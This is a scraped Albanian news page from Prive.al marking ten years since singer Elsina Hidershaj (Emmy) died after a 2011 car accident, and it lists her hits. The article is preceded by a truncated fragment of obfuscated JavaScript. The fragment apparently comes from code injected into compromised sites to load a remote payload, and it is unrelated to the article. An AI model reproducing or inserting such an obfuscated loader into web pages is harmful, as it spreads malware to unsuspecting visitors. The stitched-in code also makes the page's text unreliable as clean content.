;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Sot, 10 vite prej ndarjes nga jeta të Emmyt!

By

28 Shkurti i 2011-ës kishte nisur me një lajm të kobshëm në shoubizin shqiptar.

Këngëtarja Elsina Hidershaj e njohur me nofkën artistike Emmy ishte ndarë nga jeta, dy javë parase të mbushte 22 pranvera.

Pas dy ditëve në koma nga goditjet në kokë, shkaktuar nga aksident me makinë për të cilin u procedua penalisht një biznesmen nga Kosova, Emmy u nda nga jeta duke ndërprerë në mes një rrugëtim që premtonte shumë e mbi të gjitha duke lënë një boshllëk të pazëvendësueshëm tek familjarët e miqtë.

Emmy mbahet mend për hitet si “Rastësisht u pamë”, “Pse të dua ty”, “A ma jep” e “Lojë fjalësh”.

Kënga “Me ty” e Elvana Gjatës i ishte dedikuar pikërisht shoqes së saj, Emmyt. /Prive.al

Artikuj të ngjashëm